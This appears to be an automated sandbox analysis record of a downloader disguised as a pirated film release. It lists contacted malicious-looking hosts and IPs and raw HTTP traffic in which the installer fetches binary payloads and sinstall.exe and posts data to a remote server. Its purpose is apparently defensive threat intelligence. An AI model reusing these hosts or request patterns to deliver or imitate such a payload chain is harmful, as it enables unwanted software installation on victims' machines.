hxxp://c1.goody-best.info/?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
hxxp://c1.goody-best.info/?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A | 54.148.216.39 |
get-bluesee.info | 52.26.142.209 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:10 GMT
Content-Type: text/html
Content-Length: 10286
Connection: close
Content-Disposition: attachment; filename="6_1.txt"
<<< skipped >>>
GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:13 GMT
Content-Type: application/octet-stream
Content-Length: 545626
Connection: close
Content-Disposition: attachment; filename="hVwDePRrG2aSqC.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
<<< skipped >>>
GET /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive
<<< skipped >>>
GET /?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:19 GMT
Content-Type: text/html
Content-Length: 10226
Connection: close
Content-Disposition: attachment; filename="6_1_2.txt"
<<< skipped >>>
GET /?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:06 GMT
Content-Type: text/html
Content-Length: 8364
Connection: close
Content-Disposition: attachment; filename="4_2.txt"
<<< skipped >>>
GET /?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8366
Connection: close
Content-Disposition: attachment; filename="4.txt"
<<< skipped >>>
GET /?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 6714
Connection: close
Content-Disposition: attachment; filename="5.txt"
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5958
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:34 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:07 GMT
Content-Type: text/html
Content-Length: 2734
Connection: close
Content-Disposition: attachment; filename="4_3.txt"
<<< skipped >>>
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5368
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:04 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /get/?data=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&version=4 HTTP/1.1
Accept: */*
User-Agent: win32
Host: techine.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:59 GMT
Content-Length: 0
Connection: close
GET /?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:36 GMT
Content-Type: text/html
Content-Length: 10242
Connection: close
Content-Disposition: attachment; filename="6_1_3.txt"
<<< skipped >>>
GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:21 GMT
Content-Type: application/octet-stream
Content-Length: 2275179
Connection: close
Content-Disposition: attachment; filename="g7CyPVZagCsRV8.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
<<< skipped >>>
GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:38 GMT
Content-Type: application/octet-stream
Content-Length: 2252297
Connection: close
Content-Disposition: attachment; filename="dB1XJloRgbF4Qw.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
<<< skipped >>>
GET /?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:53 GMT
Content-Type: text/html
Content-Length: 10306
Connection: close
Content-Disposition: attachment; filename="6_1_4.txt"
<<< skipped >>>
GET /?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:08 GMT
Content-Type: text/html
Content-Length: 31266
Connection: close
Content-Disposition: attachment; filename="6.txt"
<<< skipped >>>
GET /?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:01 GMT
Content-Type: text/html
Content-Length: 8236
Connection: close
Content-Disposition: attachment; filename="6_2.txt"
<<< skipped >>>
GET /?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:12 GMT
Content-Type: text/html
Content-Length: 4214
Connection: close
Content-Disposition: attachment; filename="6_2_1.txt"
<<< skipped >>>
GET /?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:55 GMT
Content-Type: application/octet-stream
Content-Length: 524274
Connection: close
Content-Disposition: attachment; filename="fyBYRfMAYKA66R.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
<<< skipped >>>
HEAD /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive
HTTP/1.1 100 Continue
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 01 Jul 2015 04:55:14 GMT
Content-Type: application/octet-stream
Content-Length: 1085440
Last-Modified: Wed, 04 Feb 2015 13:58:06 GMT
Connection: close
ETag: "54d2256e-109000"
Accept-Ranges: bytes
POST / HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: r1.the-invention.org
Content-Length: 5998
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:51 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 2
Connection: close
{}..
GET /?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:13 GMT
Content-Type: text/html
Content-Length: 8398
Connection: close
Content-Disposition: attachment; filename="7.txt"
<<< skipped >>>
GET /2052/TerminusKeeper_143462550383614.ca HTTP/1.1
